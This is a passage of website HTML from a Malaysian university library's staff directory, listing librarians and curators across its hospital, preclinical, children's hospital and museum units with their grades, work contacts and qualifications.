data-id="4db4ed3" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <div class="elementor-heading-title elementor-size-default">Head <span>(Deputy Chief Librarian) (S52)</span></div> </div> </div> <div class="elementor-element elementor-element-93425f9 elementor-widget elementor-widget-text-editor" data-id="93425f9" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <p>mariati@ppukm.ukm.edu.my<br /><span style="font-family: 'PT Sans', sans-serif; font-size: 14px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400;">03-9289 7449</span><br />M.Sc. Information Management (UiTM)<br />B. Sc. (Hons) Library Science (UiTM)</p> </div> </div> </div> </div> <div class="elementor-column elementor-col-33 elementor-inner-column elementor-element elementor-element-0630de4" data-id="0630de4" data-element_type="column"> <div class="elementor-widget-wrap"> </div> </div> </div> </section> <section class="elementor-section elementor-inner-section elementor-element elementor-element-f319986 elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="f319986" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-20 elementor-inner-column elementor-element elementor-element-ab744f6" data-id="ab744f6" data-element_type="column"> <div class="elementor-widget-wrap"> </div> </div> <div class="elementor-column elementor-col-20 elementor-inner-column elementor-element elementor-element-f072558" data-id="f072558" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-46d2242 elementor-widget elementor-widget-image" data-id="46d2242" data-element_type="widget" data-widget_type="image.default"> <div class="elementor-widget-container"> <img loading="lazy" decoding="async" width="200" height="300" src="https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1754-200x300.jpg" class="attachment-medium size-medium wp-image-1197" alt="" srcset="https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1754-200x300.jpg 200w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1754-683x1024.jpg 683w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1754-768x1152.jpg 768w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1754-1024x1536.jpg 1024w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1754-1365x2048.jpg 1365w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1754-scaled.jpg 1706w" sizes="(max-width: 200px) 100vw, 200px" /> </div> </div> <div class="elementor-element elementor-element-af83886 elementor-widget elementor-widget-heading" data-id="af83886" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h3 class="elementor-heading-title elementor-size-default">Liyana jasman</h3> </div> </div> <div class="elementor-element elementor-element-b82044f elementor-widget elementor-widget-heading" data-id="b82044f" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <div class="elementor-heading-title elementor-size-default">Senior Librarian (S44)</div> </div> </div> <div class="elementor-element elementor-element-580fea9 elementor-widget elementor-widget-text-editor" data-id="580fea9" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <p><span style="font-family: 'PT Sans', sans-serif; font-size: 14px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400;">liyana.jasman@ppukm.ukm.edu.my<br /></span>03-9289 7494<br /><span style="font-family: 'PT Sans', sans-serif; font-size: 14px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400;">MLS (UiTM)</span><br /><span style="font-family: 'PT Sans', sans-serif; font-size: 14px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400;">B.Sc. (Hons) Information Studies (UiTM)</span></p> </div> </div> </div> </div> <div class="elementor-column elementor-col-20 elementor-inner-column elementor-element elementor-element-5e14b16" data-id="5e14b16" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-340225e elementor-widget elementor-widget-image" data-id="340225e" data-element_type="widget" data-widget_type="image.default"> <div class="elementor-widget-container"> <img loading="lazy" decoding="async" width="263" height="300" src="https://www.ukm.my/ptsl/wp-content/uploads/2021/11/faiz3-1-263x300.jpg" class="attachment-medium size-medium wp-image-7746" alt="" srcset="https://www.ukm.my/ptsl/wp-content/uploads/2021/11/faiz3-1-263x300.jpg 263w, https://www.ukm.my/ptsl/wp-content/uploads/2021/11/faiz3-1.jpg 511w" sizes="(max-width: 263px) 100vw, 263px" /> </div> </div> <div class="elementor-element elementor-element-b24987b elementor-widget elementor-widget-heading" data-id="b24987b" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h3 class="elementor-heading-title elementor-size-default">Faiz Syafiq Mohd Ali</h3> </div> </div> <div class="elementor-element elementor-element-66596dc elementor-widget elementor-widget-heading" data-id="66596dc" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <div class="elementor-heading-title elementor-size-default">Senior Librarian (S44)</div> </div> </div> <div class="elementor-element elementor-element-40705f2 elementor-widget elementor-widget-text-editor" data-id="40705f2" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <p>faizsyafiqali@ukm.edu.my<br />03-92897098<br />B.Sc. (Hons) Information and Resource Centre Management</p> </div> </div> </div> </div> <div class="elementor-column elementor-col-20 elementor-inner-column elementor-element elementor-element-45b382c" data-id="45b382c" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-799154f elementor-widget elementor-widget-image" data-id="799154f" data-element_type="widget" data-widget_type="image.default"> <div class="elementor-widget-container"> <img loading="lazy" decoding="async" width="200" height="300" src="https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1775-200x300.jpg" class="attachment-medium size-medium wp-image-1200" alt="" srcset="https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1775-200x300.jpg 200w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1775-683x1024.jpg 683w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1775-768x1152.jpg 768w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1775-1024x1536.jpg 1024w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1775-1366x2048.jpg 1366w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1775-scaled.jpg 1707w" sizes="(max-width: 200px) 100vw, 200px" /> </div> </div> <div class="elementor-element elementor-element-1fa4c64 elementor-widget elementor-widget-heading" data-id="1fa4c64" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h3 class="elementor-heading-title elementor-size-default">Adibah Ahmad</h3> </div> </div> <div class="elementor-element elementor-element-4937145 elementor-widget elementor-widget-heading" data-id="4937145" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <div class="elementor-heading-title elementor-size-default">Librarian (S41)</div> </div> </div> <div class="elementor-element elementor-element-20a930e elementor-widget elementor-widget-text-editor" data-id="20a930e" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <p>adibah@ukm.edu.my<br />03-92897474<br />MLS (UiTM)<br />B.Sc. (Hons) Information Studies (UiTM)</p> </div> </div> </div> </div> <div class="elementor-column elementor-col-20 elementor-inner-column elementor-element elementor-element-680ae82" data-id="680ae82" data-element_type="column"> <div class="elementor-widget-wrap"> </div> </div> </div> </section> <section class="elementor-section elementor-inner-section elementor-element elementor-element-7fd67fa elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="7fd67fa" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-100 elementor-inner-column elementor-element elementor-element-ce2dd44" data-id="ce2dd44" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-923ce84 elementor-widget elementor-widget-heading" data-id="923ce84" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">HOSPITAL CANSELOR TUANKU MUHRIZ LIBRARY</h2> </div> </div> </div> </div> </div> </section> <section class="elementor-section elementor-inner-section elementor-element elementor-element-3e5ccc8 elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="3e5ccc8" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-33 elementor-inner-column elementor-element elementor-element-9416b43" data-id="9416b43" data-element_type="column"> <div class="elementor-widget-wrap"> </div> </div> <div class="elementor-column elementor-col-33 elementor-inner-column elementor-element elementor-element-117e44d" data-id="117e44d" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-9dddc57 elementor-widget elementor-widget-image" data-id="9dddc57" data-element_type="widget" data-widget_type="image.default"> <div class="elementor-widget-container"> <img loading="lazy" decoding="async" width="200" height="300" src="https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1816-200x300.jpg" class="attachment-medium size-medium wp-image-1185" alt="" srcset="https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1816-200x300.jpg 200w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1816-683x1024.jpg 683w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1816-768x1152.jpg 768w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1816-1024x1536.jpg 1024w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1816-1365x2048.jpg 1365w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1816-scaled.jpg 1706w" sizes="(max-width: 200px) 100vw, 200px" /> </div> </div> <div class="elementor-element elementor-element-1555bf3 elementor-widget elementor-widget-heading" data-id="1555bf3" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h3 class="elementor-heading-title elementor-size-default"><div><span>DR. MAZNI MD YUSOF</span><span></span></div></h3> </div> </div> <div class="elementor-element elementor-element-9e882c2 elementor-widget elementor-widget-heading" data-id="9e882c2" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <div class="elementor-heading-title elementor-size-default"><span>Head (Deputy Chief Librarian) (S52)</span></div> </div> </div> <div class="elementor-element elementor-element-921ccc3 elementor-widget elementor-widget-text-editor" data-id="921ccc3" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <p><span style="font-family: 'PT Sans', sans-serif; font-size: 14px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400;">maznis@ukm.edu.my</span></p><p><span style="font-family: 'PT Sans', sans-serif; font-size: 14px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400;">03-91455331</span><br /><span style="font-family: 'PT Sans', sans-serif; font-size: 14px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400;">DInfSc (Robert Gordon University, Aberdeen)</span><br /><span style="font-family: 'PT Sans', sans-serif; font-size: 14px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400;">M.A Information & Management (Loughborough University)</span><br /><span style="font-family: 'PT Sans', sans-serif; font-size: 14px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400;">B.A (Hons) Library Science (U. Indonesia)</span></p> </div> </div> </div> </div> <div class="elementor-column elementor-col-33 elementor-inner-column elementor-element elementor-element-6f05eb4" data-id="6f05eb4" data-element_type="column"> <div class="elementor-widget-wrap"> </div> </div> </div> </section> <section class="elementor-section elementor-inner-section elementor-element elementor-element-b6a516e elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="b6a516e" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-33 elementor-inner-column elementor-element elementor-element-e77bbea" data-id="e77bbea" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-82325a4 elementor-widget elementor-widget-image" data-id="82325a4" data-element_type="widget" data-widget_type="image.default"> <div class="elementor-widget-container"> <img loading="lazy" decoding="async" width="200" height="300" src="https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1759-200x300.jpg" class="attachment-medium size-medium wp-image-1198" alt="" srcset="https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1759-200x300.jpg 200w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1759-683x1024.jpg 683w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1759-768x1152.jpg 768w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1759-1024x1536.jpg 1024w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1759-1365x2048.jpg 1365w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1759-scaled.jpg 1707w" sizes="(max-width: 200px) 100vw, 200px" /> </div> </div> <div class="elementor-element elementor-element-aa248f9 elementor-widget elementor-widget-heading" data-id="aa248f9" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h3 class="elementor-heading-title elementor-size-default">Azlan Mohamad Hamzah</h3> </div> </div> <div class="elementor-element elementor-element-bbb9252 elementor-widget elementor-widget-heading" data-id="bbb9252" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <div class="elementor-heading-title elementor-size-default">Assistant Chief Librarian (S48)</div> </div> </div> <div class="elementor-element elementor-element-ce786db elementor-widget elementor-widget-text-editor" data-id="ce786db" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <p>lanzmh@ppukm.ukm.edu.my<br />03-91455336<br />MLIS (UM)<br />B.Sc. (Hons) Information Studies (UiTM)</p> </div> </div> </div> </div> <div class="elementor-column elementor-col-33 elementor-inner-column elementor-element elementor-element-83d98c5" data-id="83d98c5" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-c4e5864 elementor-widget elementor-widget-image" data-id="c4e5864" data-element_type="widget" data-widget_type="image.default"> <div class="elementor-widget-container"> <img loading="lazy" decoding="async" width="200" height="300" src="https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1812-200x300.jpg" class="attachment-medium size-medium wp-image-1203" alt="" srcset="https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1812-200x300.jpg 200w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1812-683x1024.jpg 683w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1812-768x1152.jpg 768w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1812-1024x1536.jpg 1024w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1812-1366x2048.jpg 1366w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1812-scaled.jpg 1707w" sizes="(max-width: 200px) 100vw, 200px" /> </div> </div> <div class="elementor-element elementor-element-37f93ae elementor-widget elementor-widget-heading" data-id="37f93ae" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h3 class="elementor-heading-title elementor-size-default">Azhari Sahamir</h3> </div> </div> <div class="elementor-element elementor-element-126447c elementor-widget elementor-widget-heading" data-id="126447c" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <div class="elementor-heading-title elementor-size-default">Senior Librarian (S44)</div> </div> </div> <div class="elementor-element elementor-element-5a1fccf elementor-widget elementor-widget-text-editor" data-id="5a1fccf" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <p>azhari@ukm.edu.my<br />03-91455334<br />B.Sc. (Hons) Information Studies (UiTM)</p> </div> </div> </div> </div> <div class="elementor-column elementor-col-33 elementor-inner-column elementor-element elementor-element-a9b1e42" data-id="a9b1e42" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-c1b1860 elementor-widget elementor-widget-image" data-id="c1b1860" data-element_type="widget" data-widget_type="image.default"> <div class="elementor-widget-container"> <img loading="lazy" decoding="async" width="200" height="300" src="https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1768-200x300.jpg" class="attachment-medium size-medium wp-image-1199" alt="" srcset="https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1768-200x300.jpg 200w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1768-683x1024.jpg 683w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1768-768x1152.jpg 768w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1768-1024x1536.jpg 1024w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1768-1365x2048.jpg 1365w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1768-scaled.jpg 1707w" sizes="(max-width: 200px) 100vw, 200px" /> </div> </div> <div class="elementor-element elementor-element-88ce8dc elementor-widget elementor-widget-heading" data-id="88ce8dc" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h3 class="elementor-heading-title elementor-size-default"><span>QURRATUL SYAHEERA BINTI AHMAD TERMIZI</span></h3> </div> </div> <div class="elementor-element elementor-element-6781905 elementor-widget elementor-widget-heading" data-id="6781905" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <div class="elementor-heading-title elementor-size-default">Librarian (S41)</div> </div> </div> <div class="elementor-element elementor-element-d544747 elementor-widget elementor-widget-text-editor" data-id="d544747" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <p>qurratulsyaheera@ppukm.ukm.edu.my<br />03-91455337<br />B.Sc. (Hons) Information Studies (UiTM)</p> </div> </div> </div> </div> </div> </section> <section class="elementor-section elementor-inner-section elementor-element elementor-element-e4e7731 elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="e4e7731" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-100 elementor-inner-column elementor-element elementor-element-c1122de" data-id="c1122de" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-af67891 elementor-widget elementor-widget-heading" data-id="af67891" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">PRECLINICAL LIBRARY</h2> </div> </div> </div> </div> </div> </section> <section class="elementor-section elementor-inner-section elementor-element elementor-element-5f680de elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="5f680de" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-33 elementor-inner-column elementor-element elementor-element-32f850d" data-id="32f850d" data-element_type="column"> <div class="elementor-widget-wrap"> </div> </div> <div class="elementor-column elementor-col-33 elementor-inner-column elementor-element elementor-element-24d9a22" data-id="24d9a22" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-46d7402 elementor-widget elementor-widget-image" data-id="46d7402" data-element_type="widget" data-widget_type="image.default"> <div class="elementor-widget-container"> <img loading="lazy" decoding="async" width="200" height="300" src="https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1780-200x300.jpg" class="attachment-medium size-medium wp-image-1201" alt="" srcset="https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1780-200x300.jpg 200w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1780-683x1024.jpg 683w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1780-768x1152.jpg 768w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1780-1024x1536.jpg 1024w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1780-1365x2048.jpg 1365w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1780-scaled.jpg 1706w" sizes="(max-width: 200px) 100vw, 200px" /> </div> </div> <div class="elementor-element elementor-element-3f30254 elementor-widget elementor-widget-heading" data-id="3f30254" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h3 class="elementor-heading-title elementor-size-default"><h3>NORAINI MAT ALI</h3></h3> </div> </div> <div class="elementor-element elementor-element-00c2290 elementor-widget elementor-widget-heading" data-id="00c2290" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <div class="elementor-heading-title elementor-size-default">Head (Senior Librarian) (S44)</div> </div> </div> <div class="elementor-element elementor-element-2ca23c2 elementor-widget elementor-widget-text-editor" data-id="2ca23c2" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <p><span style="font-family: 'PT Sans', sans-serif; font-size: 14px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400;">norain@ppukm.ukm.edu.my</span><br /><span style="font-family: 'PT Sans', sans-serif; font-size: 14px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400;">03-91458692</span><br /><span style="font-family: 'PT Sans', sans-serif; font-size: 14px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400;">MLIS (UM)</span><br /><span style="font-family: 'PT Sans', sans-serif; font-size: 14px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400;">B.A (Hons) Islamic Studies (UKM)</span></p> </div> </div> </div> </div> <div class="elementor-column elementor-col-33 elementor-inner-column elementor-element elementor-element-2179f21" data-id="2179f21" data-element_type="column"> <div class="elementor-widget-wrap"> </div> </div> </div> </section> <section class="elementor-section elementor-inner-section elementor-element elementor-element-db17810 elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="db17810" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-100 elementor-inner-column elementor-element elementor-element-b928200" data-id="b928200" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-6cbcc0e elementor-widget elementor-widget-heading" data-id="6cbcc0e" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">SPECIALIST CHILDREN'S HOSPITAL LIBRARY</h2> </div> </div> <section class="elementor-section elementor-inner-section elementor-element elementor-element-8abbc7d elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="8abbc7d" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-33 elementor-inner-column elementor-element elementor-element-9eefc93" data-id="9eefc93" data-element_type="column"> <div class="elementor-widget-wrap"> </div> </div> <div class="elementor-column elementor-col-33 elementor-inner-column elementor-element elementor-element-7fb9e9f" data-id="7fb9e9f" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-755a3e7 elementor-widget elementor-widget-image" data-id="755a3e7" data-element_type="widget" data-widget_type="image.default"> <div class="elementor-widget-container"> <img loading="lazy" decoding="async" width="200" height="300" src="https://www.ukm.my/ptsl/wp-content/uploads/2021/06/afifah-200x300.jpg" class="attachment-medium size-medium wp-image-5427" alt="" srcset="https://www.ukm.my/ptsl/wp-content/uploads/2021/06/afifah-200x300.jpg 200w, https://www.ukm.my/ptsl/wp-content/uploads/2021/06/afifah-683x1024.jpg 683w, https://www.ukm.my/ptsl/wp-content/uploads/2021/06/afifah-768x1152.jpg 768w, https://www.ukm.my/ptsl/wp-content/uploads/2021/06/afifah-1024x1536.jpg 1024w, https://www.ukm.my/ptsl/wp-content/uploads/2021/06/afifah-1366x2048.jpg 1366w, https://www.ukm.my/ptsl/wp-content/uploads/2021/06/afifah-scaled.jpg 1707w" sizes="(max-width: 200px) 100vw, 200px" /> </div> </div> <div class="elementor-element elementor-element-c1d9999 elementor-widget elementor-widget-heading" data-id="c1d9999" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h3 class="elementor-heading-title elementor-size-default">Wan Nur Afifah Wan Yahya</h3> </div> </div> <div class="elementor-element elementor-element-6a33cbb elementor-widget elementor-widget-heading" data-id="6a33cbb" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <div class="elementor-heading-title elementor-size-default">Head (Senior Librarian) (S44)</div> </div> </div> <div class="elementor-element elementor-element-cf23b2c elementor-widget elementor-widget-text-editor" data-id="cf23b2c" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <p>afifahyahya@ppukm.ukm.edu.my<br />03-91748307<br />B.Sc. (Hons) Information Studies (UiTM)</p> </div> </div> </div> </div> <div class="elementor-column elementor-col-33 elementor-inner-column elementor-element elementor-element-b7246c8" data-id="b7246c8" data-element_type="column"> <div class="elementor-widget-wrap"> </div> </div> </div> </section> </div> </div> </div> </section> <section class="elementor-section elementor-inner-section elementor-element elementor-element-90307e9 elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="90307e9" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-100 elementor-inner-column elementor-element elementor-element-c9b56e2" data-id="c9b56e2" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-5e968c0 elementor-widget elementor-widget-heading" data-id="5e968c0" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">MANAGEMENT OF MUSEUMS & GALLERIES</h2> </div> </div> <section class="elementor-section elementor-inner-section elementor-element elementor-element-c783850 elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="c783850" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-33 elementor-inner-column elementor-element elementor-element-4c977f6" data-id="4c977f6" data-element_type="column"> <div class="elementor-widget-wrap"> </div> </div> <div class="elementor-column elementor-col-33 elementor-inner-column elementor-element elementor-element-298f554" data-id="298f554" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-4153664 elementor-widget elementor-widget-image" data-id="4153664" data-element_type="widget" data-widget_type="image.default"> <div class="elementor-widget-container"> <img loading="lazy" decoding="async" width="218" height="300" src="https://www.ukm.my/ptsl/wp-content/uploads/2023/03/yazid3-218x300.jpg" class="attachment-medium size-medium wp-image-12897" alt="" srcset="https://www.ukm.my/ptsl/wp-content/uploads/2023/03/yazid3-218x300.jpg 218w, https://www.ukm.my/ptsl/wp-content/uploads/2023/03/yazid3.jpg 420w" sizes="(max-width: 218px) 100vw, 218px" /> </div> </div> <div class="elementor-element elementor-element-a6076c9 elementor-widget elementor-widget-heading" data-id="a6076c9" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h4 class="elementor-heading-title elementor-size-default">MOHD YAZID MOHD ABZAL KHAN</h4> </div> </div> <div class="elementor-element elementor-element-97d080a elementor-widget elementor-widget-heading" data-id="97d080a" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <div class="elementor-heading-title elementor-size-default">Head (Curator) (S48)</div> </div> </div> <div class="elementor-element elementor-element-b9660f1 elementor-widget elementor-widget-text-editor" data-id="b9660f1" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <p>muadz@ukm.edu.my<br />03-8921 5292<br />聽BSW Mgt. (Hons.) (UUM)</p> </div> </div> </div> </div> <div class="elementor-column elementor-col-33 elementor-inner-column elementor-element elementor-element-7de1c2a" data-id="7de1c2a" data-element_type="column"> <div class="elementor-widget-wrap"> </div> </div> </div> </section> <section class="elementor-section elementor-inner-section elementor-element elementor-element-4a269ee elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="4a269ee" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-25 elementor-inner-column elementor-element elementor-element-effac73" data-id="effac73" data-element_type="column"> <div class="elementor-widget-wrap"> </div> </div> <div class="elementor-column elementor-col-25 elementor-inner-column elementor-element elementor-element-638a378" data-id="638a378" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-9efac22 elementor-widget elementor-widget-image" data-id="9efac22" data-element_type="widget" data-widget_type="image.default"> <div class="elementor-widget-container"> <img loading="lazy" decoding="async" width="218" height="300" src="https://www.ukm.my/ptsl/wp-content/uploads/2023/03/adil-218x300.jpg" class="attachment-medium size-medium wp-image-12882" alt="" srcset="https://www.ukm.my/ptsl/wp-content/uploads/2023/03/adil-218x300.jpg 218w, https://www.ukm.my/ptsl/wp-content/uploads/2023/03/adil.jpg 420w" sizes="(max-width: 218px) 100vw, 218px" /> </div> </div> <div class="elementor-element elementor-element-94a2d6d elementor-widget elementor-widget-heading" data-id="94a2d6d" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <div class="elementor-heading-title elementor-size-medium">MOHD ADIL AFDHAL ABDUL RAHIM</div> </div> </div> <div class="elementor-element elementor-element-c6d21d9 elementor-widget elementor-widget-heading" data-id="c6d21d9" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <div class="elementor-heading-title elementor-size-default">Assistant Curator (S32)</div> </div> </div> <div class="elementor-element elementor-element-054a20a elementor-widget elementor-widget-text-editor" data-id="054a20a" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <p>adil@ukm.edu.my<br />03-8921 3136</p> </div> </div> </div> </div> <div class="elementor-column elementor-col-25 elementor-inner-column elementor-element elementor-element-b21ee8e" data-id="b21ee8e" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-d0610ac elementor-widget elementor-widget-image" data-id="d0610ac" data-element_type="widget" data-widget_type="image.default"> <div class="elementor-widget-container"> <img loading="lazy" decoding="async" width="216" height="300" src="https://www.ukm.my/ptsl/wp-content/uploads/2023/03/dewina-216x300.jpg" class="attachment-medium size-medium wp-image-12886" alt="" srcset="https://www.ukm.my/ptsl/wp-content/uploads/2023/03/dewina-216x300.jpg 216w, https://www.ukm.my/ptsl/wp-content/uploads/2023/03/dewina.jpg 417w" sizes="(max-width: 216px) 100vw, 216px" /> </div> </div> <div class="elementor-element elementor-element-fc9f52d elementor-widget elementor-widget-heading" data-id="fc9f52d" 